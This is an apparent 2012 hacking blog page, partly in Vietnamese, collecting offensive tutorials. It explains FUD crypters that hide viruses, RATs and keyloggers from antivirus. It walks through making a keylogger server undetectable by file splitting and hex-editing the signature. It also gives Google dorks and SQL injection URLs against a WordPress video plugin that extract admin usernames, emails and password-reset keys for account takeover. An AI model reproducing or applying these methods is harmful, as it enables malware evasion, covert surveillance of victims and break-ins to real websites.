Saturday, October 6, 2012

How to bypass antivirus detection | FUD crypter Free download


What is FUD Crypter? Download it for Free
What Is FUD Crypter?
FUD is acronym for fully undetectable.It is a software that can be used to encrypt your exe files.
What is the use of FUD Crypter?
FUD crypters can be used to encrypt viruses,RAT,keyloggers,spywares etc to make them undetectable from antiviruses.You can also read my post on spywares,viruses and worms.When these exe files are encrypted with Fud crypters they become undetectable with antiviruses
How Does FUD Crypter Work?
The Basic Working Of FUD Crypter is explained below
The Crypter takes the original binary file of you exe and applies many encryption on it and stores on the end of file(EOF).So a new crypted executable file is created.
Original Exe Crypted Exe
001————- 010                                      101————-110
100|Original File|000->  Cryptor  ->010|Original File|110
010————- 111                                        110————-010
The new exe is not detected by antiviruses because its code is scrambled by the crypter.When executed the new .exe file decrypts the binary file into small the data small pieces at a time and injects them into another already existing process or a new empty one, OR it drops the code into multiple chunks in alternative data streams(not scanned by most a/v) then executes it as a .txt or .mp3 file.
Why Most FUD Crypters Donot Work?
As a FUD crypter becomes popular it also get the eyes of antivirus companies.The antivirus companies update their software and employ detection mechanism that detect the encryption’s by the crypter.So, most of the popular FUD crypter are easily detected by antiviruses.
Note:-Donot test your crypter on virustotal.com as it distributes the samples and your crypter will not remain FUD if you scan with virustotal.
Where can I Download a Free FUD crypter?
As I already mentioned that as the crypter becomes popular it doesnot remain FUD.So the only FUD crypter available are those made by indivuals and they can be found by spending a little time on google by searching.It will not make profit to anybody if I share my FUD crypter here as it will not remain FUD for long as some noobs will surely scan it with virustoal.So,its better you search your own and keep it to yourself.
Note: .netframework should  be installed in your system before running the crypter.

hope you like the post.:)
vào lúc No comments:

How to FUD your trojan/server with a HEX editing & File splitting method

Our FUDDING tool requirements and download links.




First of course an AV what I am going to be using is AVAST the free edition.

DOWNLOAD HERE

File splitter to split our servers to find out where the virus signature is to modify it.
DOWNLOAD HERE


Best hex editor I have found and its free of charge.
DOWNLOAD HERE



Now lets begin.

Now go grab the server you want to edit mine is going to be a Spyrex keylogger server you can use any keylogger server like neptune,ardamax,elite..etcetc.

Before we begin turn AV off.

You result may vary on AV your using.

Now place you server in a folder I recommend naming it A trust me on this. Now my server name is test.exe.

Okay now once you have placed the server in a file lets scan it.

And.......

OMG it got caught



Ok now where to start open The File Splitter and Calc.exe to split the file.

In
the file splitter browse to the server you want to split and choose
Custom size. Now it tells me that this server is exactly 53,495 bytes
and I want to split it into 4 pieces. So I go to Calc and divide it by 4
now place the number you got after dividing it and place it in the
splitter custom size box like I have at the bottom. Now click on Split.





 
Now you should get the files in the same directory like I have below.





Now scan each of them to figure out witch file we have to split again.


Now once you have figured it out make a new folder named the part
number that was detected now I got part 3 so I'm gonna make a new folder
named 3 .

Now I
hope you didn't close file splitter if so reopen it and browse to
test.exe.3 to split and change the output folder to 3 like I have in the
picture below. We are also going to split this file into 4 pieces again
so open up Calc and divide by 4.

I made a drawing on this if your confused


Now you should have this inside folder named 3.


Now
scan each file again to figure out witch file we need to split but also
be aware of how small the file is getting. Once you figure out witch
file needs splitting make a new folder with the parts name. I got part
test.exe.3.3 so I am going to make a new folder and name it 3.


Now
once you made new folder named 3 open up file splitter and browse to
the file that got detected mine was test.exe.3.3 and pick the output
directory to the folder we just made witch was the folder named 3.


Now
browse to the new folder and scan the new files we split. As you can
see test.exe.3.3.4 was detected so I'm gonna make a new folder and name
it 4.


Now in file splitter pick the file that got detected witch was test.exe.3.3.4 and choose the new folder we made named 4.



Now lets scan the new files and see witch got detected ocne we find it open it up with the HEX editor and see if its still to big to figure out what we need to change.


Ok so it's test.3.3.4.1 that we need to edit do open it up with your favorite hex editor or use the one I provided earlier. Once you open it it will look something like this.


Now
the virus signature is in here don't get scared its not that hard now
my method of figuring it is looking for something that stands out or
guesssing. All you really have to do is change a letter from capital to a
lower case one now what worked for me was changing D to a lower case
from the word DLLHOOKSTRUCT.



Congratz now its FUD now all you need to do it compile it and scan it one more time and run it to test.

Now compiling I will show you one example and you can figure out the rest by your own.

Now you see the splitter icon inside your folder click on it and it will recompile the file.



Now

once you made that file copy it and go back one directory and past it

then it will ask you to replace it click yes and keep doing this till

you go back to first directory. And your done.


I really hope you learn something this took me like 3 hours.

vào lúc No comments:

Phishing Attack via social engineering toolkit | Backtrack 5


vào lúc No comments:

Bug + UpShell với Wordpress HD Webplayer 1.1

Tìm site có lỗi:
chép vào google là được
Code:


Quote:
# Dork 1 (config.php)
inurl:"/wp-content/plugins/hd-webplayer/config.php?id="

# Dork 2 (playlist.php)
inurl:"/wp-content/plugins/hd-webplayer/playlist.php?videoid="

# Dork 3 (General):
inurl:"/wp-content/plugins/hd-webplayer/"
Vidụ ta có web sau:

ta bắt đầu get lấy (Username & Email)
Quote:
http://domain.com/wp-content/plugins....php?videoid=7 UNION SELECT 1,2,3,group_concat(user_login,0x3a,user_email,0x3b ),5,6,7,8,9,10,11 FROM wp_users--
lấy email của admin rồi dán vào đây:
tiếp đấy ta lấy key đổi password user_login & user_activation_key)
Quote:
http://domain.com/wp-content/plugins....php?videoid=7 UNION SELECT 1,2,3,group_concat(user_login,0x3a,user_activation _key,0x3b),5,6,7,8,9,10,11 FROM wp_users--
Dán user admin & key theo link sau:
sau đó nhập password mới vào... chúc các bác thành công nhé


Video:
vào lúc No comments:

Code Show Ảnh + Portfolio

Demo: xbuidoi.net

Download:
http://adf.ly/DS7Cj
vào lúc No comments:

Code Show Ảnh + Portfolio

Demo: xbuidoi.net

Download:
http://adf.ly/DS7Cj
vào lúc No comments: